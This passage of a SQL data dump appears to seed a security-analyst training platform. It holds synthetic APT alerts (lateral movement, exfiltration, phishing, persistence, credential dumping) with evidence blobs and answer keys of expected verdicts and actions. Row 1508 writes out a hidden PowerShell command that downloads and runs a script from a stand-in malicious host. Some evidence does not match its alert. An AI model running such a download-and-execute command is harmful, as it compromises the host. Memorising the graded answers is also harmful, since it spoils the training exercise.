4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1505, 'Lateral Movement Detected through SMB Protocol', 'high', 'Network Traffic Analysis', 'An advanced persistent threat has been detected leveraging the SMB protocol for lateral movement within the network. The adversary is attempting to compromise additional internal systems, utilizing known credentials and malicious tools.', 'Network Intrusion', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"192.168.1.150\",\"protocol\":\"SMB\",\"action\":\"allowed\",\"username\":\"jdoe\",\"file_accessed\":\"\\\\\\\\192.168.1.150\\\\C$\\\\Windows\\\\System32\\\\malicious.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"external_ip\":\"203.0.113.45\",\"event_id\":\"SMB-Event-445\",\"event_description\":\"Successful SMB connection and file transfer detected.\"}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal network IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Target internal IP address for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with external attacker.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_blacklist\",\"verdict\":\"malicious\",\"details\":\"Hash of malicious executable associated with APT activity.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1506, 'Data Exfiltration via Encrypted Channels', 'critical', 'Outbound Traffic Logs', 'In the final stage of the operation, the exfiltration of sensitive government data was detected over encrypted channels. The activity aligns with the NetTraveler APT group, indicating a sophisticated espionage effort.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"10.0.1.25\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"government_documents.zip\",\"action\":\"allowed\",\"bytes_sent\":10485760,\"indicator\":\"NetTraveler\"}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with NetTraveler APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash known to be used in exfiltration activities by APT groups.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"government_documents.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Filename contains sensitive government data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.163Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"government_documents.zip\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_sent\\\":10485760,\\\"indicator\\\":\\\"NetTraveler\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1507, 'Spear Phishing Attempt Detected', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting key personnel at a defense supplier in Japan. The email contained a malicious attachment designed to gain initial access to the supply chain networks.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:30Z\",\"email_subject\":\"Urgent: Updated Project Plans\",\"sender_email\":\"john.doe@trusted-partner.com\",\"recipient_email\":\"satoshi.takahashi@defense-supplier.jp\",\"sender_ip\":\"198.51.100.25\",\"recipient_ip\":\"192.168.1.45\",\"attachment_name\":\"Project_Plans_2023.exe\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_url\":\"http://malicious-link.com/download\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"detection_method\":\"Signature-Based Detection\",\"email_content\":\"Please review the attached project plans and let me know if you have any questions. Regards, John Doe\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@trusted-partner.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known phishing server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware by multiple engines.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Hosts malware files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Attempt Detected\",\"date\":\"2026-03-15T20:58:15.167Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1508, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR) Logs', 'A backdoor was executed on the host system, allowing remote command execution by IceFog. The backdoor was part of a malicious payload opened by the user.', 'Malware', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:30Z\",\"event_id\":\"EDR12345\",\"hostname\":\"DESKTOP-ABC123\",\"username\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious-domain.com/payload.ps1\')\",\"file_hash\":\"2fd4e1c67a2d28fced849ee1bb76e7391b93eb12\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"filename\":\"payload.ps1\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with IceFog.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"2fd4e1c67a2d28fced849ee1bb76e7391b93eb12\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known IceFog payload.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payload.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to execute the IceFog backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1509, 'Establishing Persistence via Registry Key Modification', 'medium', 'System Configuration Audits', 'During a routine system configuration audit, it was detected that IceFog is attempting to establish persistence by embedding scripts in startup folders and modifying registry keys. This ensures access even if the system is rebooted.', 'TTPs', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"registry_modification\",\"username\":\"compromised_user\",\"host_ip\":\"192.168.1.23\",\"external_ip\":\"203.0.113.45\",\"modified_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousScript\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\evil_script.vbs\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"action\":\"added\",\"indicator\":\"persistence_attempt\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with IceFog activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\evil_script.vbs\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to maintain persistence on the host.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with IceFog malware samples.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1510, 'Credential Dumping Activity Detected', 'high', 'Active Directory Logs', 'Anomalous credential harvesting activities detected from an internal host indicating potential lateral movement by the IceFog APT group. The attacker is utilizing compromised credentials to access additional systems within the network.', 'Credential Access', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:21Z\",\"event_id\":\"4625\",\"logon_type\":\"3\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.0.0.5\",\"username\":\"john.doe\",\"domain\":\"corp.local\",\"process_name\":\"lsass.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.45\",\"activity\":\"Suspicious credential access attempt\",\"status\":\"Failed logon\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host initiating suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with credential dumping tools.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1511, 'Data Exfiltration Alert', 'high', 'Network Traffic Analysis', 'In the final stage, IceFog initiates data exfiltration, targeting sensitive defense documents and transferring them to external servers under their control.', 'Data Theft', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:54Z\",\"src_ip\":\"10.0.1.25\",\"dst_ip\":\"203.0.113.45\",\"src_port\":443,\"dst_port\":8080,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_name\":\"confidential_defense_docs.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"exfiltration_attempt\",\"status\":\"success\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used to initiate connection.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known external server associated with IceFog APT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_defense_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive defense-related documents.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltration malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised to perform data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
